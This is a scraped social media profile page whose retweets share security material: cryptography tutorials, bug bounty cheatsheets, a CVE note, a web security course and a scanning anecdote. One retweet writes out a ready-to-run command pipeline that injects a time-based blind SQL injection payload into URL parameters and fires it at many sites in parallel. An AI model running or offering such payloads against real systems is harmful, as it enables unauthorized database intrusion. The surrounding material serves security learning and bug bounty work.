thebinarychunk's profile picture.

๐–‡๐–Ž๐–“๐–†๐–—๐–ž๐–ˆ๐–๐–š๐–“๐–

@thebinarychunk

็ฝฎ้ ‚

No one really cares about you, so just focus on yourself; in the end, you will be alone anyway.


๐–‡๐–Ž๐–“๐–†๐–—๐–ž๐–ˆ๐–๐–š๐–“๐– ๅทฒ่ฝ‰็™ผ

The one who took the photo


๐–‡๐–Ž๐–“๐–†๐–—๐–ž๐–ˆ๐–๐–š๐–“๐– ๅทฒ่ฝ‰็™ผ

Excellent introduction to cryptography concepts for beginners with practical examples in Linux (openssl) (credits @sergioprado) Part 1: sergioprado.blog/introduction-tโ€ฆ Part 2: sergioprado.blog/a-hands-on-appโ€ฆ Part 3: sergioprado.blog/asymmetric-keyโ€ฆ #cryptography #infosec #cybersecurity

0xor0ne's tweet image. Excellent introduction to cryptography concepts for beginners with practical examples in Linux (openssl)
(credits @sergioprado)

Part 1: sergioprado.blog/introduction-tโ€ฆ
Part 2: sergioprado.blog/a-hands-on-appโ€ฆ
Part 3: sergioprado.blog/asymmetric-keyโ€ฆ

#cryptography #infosec #cybersecurity
0xor0ne's tweet image. Excellent introduction to cryptography concepts for beginners with practical examples in Linux (openssl)
(credits @sergioprado)

Part 1: sergioprado.blog/introduction-tโ€ฆ
Part 2: sergioprado.blog/a-hands-on-appโ€ฆ
Part 3: sergioprado.blog/asymmetric-keyโ€ฆ

#cryptography #infosec #cybersecurity
0xor0ne's tweet image. Excellent introduction to cryptography concepts for beginners with practical examples in Linux (openssl)
(credits @sergioprado)

Part 1: sergioprado.blog/introduction-tโ€ฆ
Part 2: sergioprado.blog/a-hands-on-appโ€ฆ
Part 3: sergioprado.blog/asymmetric-keyโ€ฆ

#cryptography #infosec #cybersecurity

๐–‡๐–Ž๐–“๐–†๐–—๐–ž๐–ˆ๐–๐–š๐–“๐– ๅทฒ่ฝ‰็™ผ

Web Application Exploits Checklist in a sumโ—๐Ÿ‘ป Don't forget to add it to your bookmarks.๐Ÿคž๐Ÿปโ˜บ๏ธ #cybersecuritytips #appsec #PenTest #BugBounty #exploits #checklist Part I โฌ‡๏ธ

brcyrr's tweet image. Web Application Exploits Checklist in a sumโ—๐Ÿ‘ป

Don't forget to add it to your bookmarks.๐Ÿคž๐Ÿปโ˜บ๏ธ

#cybersecuritytips #appsec #PenTest #BugBounty #exploits #checklist 

Part I โฌ‡๏ธ

๐–‡๐–Ž๐–“๐–†๐–—๐–ž๐–ˆ๐–๐–š๐–“๐– ๅทฒ่ฝ‰็™ผ

SQLi Time Based with Curl apt install moreutils apt install parallel cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)" > blindsqli.txt (or any other payload) cat blindsqli.txt | parallel -j50 -q curl -o /dev/null -s -w %{time_total}\\n

adrielsec's tweet image. SQLi Time Based with Curl
apt install moreutils
apt install parallel 

cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM (SELECT(SLEEP(10)))SUmc)" > blindsqli.txt    (or any other payload)

cat blindsqli.txt | parallel -j50 -q curl -o /dev/null -s -w %{time_total}\\n

๐–‡๐–Ž๐–“๐–†๐–—๐–ž๐–ˆ๐–๐–š๐–“๐– ๅทฒ่ฝ‰็™ผ
7h3h4ckv157's tweet image. CVE-Exploits Search ๐Ÿ“ข

cvexploits.io

#cybersecurity #Pentesting #Hacking #bugbountytips #infosec #cybersecuritytips #redteam #coding #100DaysOfHacking  #vulnerabilities #BugBounty #opensource #0day #100DaysOfCyberSecurity #CVE #CyberSecurityAwareness

๐–‡๐–Ž๐–“๐–†๐–—๐–ž๐–ˆ๐–๐–š๐–“๐– ๅทฒ่ฝ‰็™ผ

100 Days of Hacking! Day 31 #SpeciaL โฌ‡ ~# WebHacking (BugBounty) Cheatsheet ๐Ÿ“ข 1. Cross Site Scripting ( XSS ) Vulnerability - github.com/EdOverflow/bugโ€ฆ - github.com/payloadbox/xssโ€ฆ - portswigger.net/web-security/cโ€ฆ 2. SQL Injection - github.com/EdOverflow/bugโ€ฆ -โ€ฆ


๐–‡๐–Ž๐–“๐–†๐–—๐–ž๐–ˆ๐–๐–š๐–“๐– ๅทฒ่ฝ‰็™ผ

CVE-2023-28252: Windows Common Log File System Driver Elevation of Privilege Vulnerability #cybersecurity #infosec #incidentresponse #securityanalyst googleprojectzero.github.io/0days-in-the-wโ€ฆ

themealsready's tweet image. CVE-2023-28252: Windows Common Log File System Driver Elevation of Privilege Vulnerability
#cybersecurity #infosec #incidentresponse #securityanalyst
googleprojectzero.github.io/0days-in-the-wโ€ฆ

๐–‡๐–Ž๐–“๐–†๐–—๐–ž๐–ˆ๐–๐–š๐–“๐– ๅทฒ่ฝ‰็™ผ

found this Stanford course for web security; with exam papers, assignments, labs & everything: web.stanford.edu/class/cs253/ a true goldmine ๐Ÿซก


๐–‡๐–Ž๐–“๐–†๐–—๐–ž๐–ˆ๐–๐–š๐–“๐– ๅทฒ่ฝ‰็™ผ

If you attended #bsidesseattle today, we hope you had the opportunity to stop by our booth to learn more about MSRC and chat with our team.

msftsecresponse's tweet image. If you attended #bsidesseattle today, we hope you had the opportunity to stop by our booth to learn more about MSRC and chat with our team.

๐–‡๐–Ž๐–“๐–†๐–—๐–ž๐–ˆ๐–๐–š๐–“๐– ๅทฒ่ฝ‰็™ผ

When you have a super-huge scope (*.target.*.*), fire-up your VPS and feed everything to it and go to sleep. I found this critical vulnerability using unmodified @pdnuclei. Btw, I wonder why the severity says "medium" in Nuclei, where it supposed to be critical 10. #BugBounty

nav1n0x's tweet image. When you have a super-huge scope (*.target.*.*), fire-up your VPS and feed everything to it and go to sleep. I found this critical vulnerability using unmodified @pdnuclei. Btw, I wonder why the severity says "medium" in Nuclei, where it supposed to be critical 10. #BugBounty
nav1n0x's tweet image. When you have a super-huge scope (*.target.*.*), fire-up your VPS and feed everything to it and go to sleep. I found this critical vulnerability using unmodified @pdnuclei. Btw, I wonder why the severity says "medium" in Nuclei, where it supposed to be critical 10. #BugBounty
nav1n0x's tweet image. When you have a super-huge scope (*.target.*.*), fire-up your VPS and feed everything to it and go to sleep. I found this critical vulnerability using unmodified @pdnuclei. Btw, I wonder why the severity says "medium" in Nuclei, where it supposed to be critical 10. #BugBounty

United States ่ถจๅ‹ข

Loading...

Something went wrong.


Something went wrong.